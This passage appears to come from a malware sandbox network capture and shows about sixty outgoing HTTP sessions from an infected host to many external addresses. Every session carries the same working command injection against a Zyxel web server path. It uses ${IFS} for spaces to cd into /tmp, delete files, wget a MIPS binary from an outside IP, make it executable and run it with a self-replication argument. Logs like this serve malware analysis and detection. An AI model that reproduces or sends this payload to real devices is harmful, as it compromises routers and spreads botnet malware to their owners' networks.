                                            Feb 2, 2024 06:21:25.889795065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7753192.168.2.154787296.103.190.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889827013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7754192.168.2.153425687.165.105.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889863968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7755192.168.2.1536278111.155.50.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889931917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7756192.168.2.1539078171.210.194.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889934063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7757192.168.2.1560238186.207.104.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.889982939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7758192.168.2.156045662.223.244.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890007973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7759192.168.2.155651082.109.79.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890049934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7760192.168.2.1549328100.237.238.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890083075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7761192.168.2.153670848.124.188.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890111923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7762192.168.2.15530988.132.189.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890155077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7763192.168.2.153632017.186.246.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890202045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7764192.168.2.1534484123.177.170.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890233994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7765192.168.2.1538986187.152.34.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890259981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7766192.168.2.1546298119.59.207.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890301943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7767192.168.2.1555076125.193.226.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890357971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7768192.168.2.1533204220.60.100.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890418053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7769192.168.2.153910214.96.151.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890448093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7770192.168.2.154690264.181.127.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890487909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7771192.168.2.155952873.146.219.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890521049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7772192.168.2.1556844171.34.1.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890567064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7773192.168.2.154045250.176.242.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890616894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7774192.168.2.153881863.78.59.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890641928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7775192.168.2.1534320206.13.15.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890702009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7776192.168.2.1538818134.186.253.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890728951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7777192.168.2.1554596202.39.33.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890768051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7778192.168.2.1537712166.113.144.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890805960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7779192.168.2.1533770156.87.253.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890850067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7780192.168.2.154493267.225.5.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890886068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7781192.168.2.153515427.106.151.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890923977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7782192.168.2.1532866111.166.57.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.890953064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7783192.168.2.1553046218.79.28.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891007900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7784192.168.2.1545076180.209.167.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891024113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7785192.168.2.153336289.173.212.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891082048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7786192.168.2.1547276196.157.51.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891104937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7787192.168.2.1553544154.173.95.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891144037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7788192.168.2.1548846192.231.90.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891192913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7789192.168.2.156053066.245.0.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891227961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7790192.168.2.1556002130.25.194.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891256094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7791192.168.2.1541996167.157.221.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891309977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7792192.168.2.153480445.250.141.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891361952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7793192.168.2.154085299.73.122.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891371965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7794192.168.2.154747298.176.26.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891417027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7795192.168.2.1535592132.194.32.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891454935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7796192.168.2.153634283.49.192.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891514063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7797192.168.2.153782296.24.3.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891515970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7798192.168.2.1560216187.163.150.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891573906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7799192.168.2.154026653.165.169.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891603947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7800192.168.2.1542224197.62.228.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891640902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7801192.168.2.153477292.176.186.129443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891685009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7802192.168.2.1539558220.126.23.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891730070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7803192.168.2.153366027.132.120.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891757011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7804192.168.2.1560452146.211.225.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891786098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7805192.168.2.154089213.160.82.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891814947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7806192.168.2.155690813.47.198.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891846895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7807192.168.2.1551332164.254.96.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891908884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7808192.168.2.153882488.14.237.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891937017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7809192.168.2.1556788149.116.224.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.891977072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7810192.168.2.1533066216.102.8.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892021894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7811192.168.2.1545688219.115.61.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892061949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7812192.168.2.153881638.98.15.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892095089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7813192.168.2.1546428167.227.15.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892122984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7814192.168.2.154288037.221.50.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892160892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7815192.168.2.1555412101.146.94.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.892216921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7816192.168.2.154694447.183.155.155443
                                            TimestampBytes transferredDirectionData
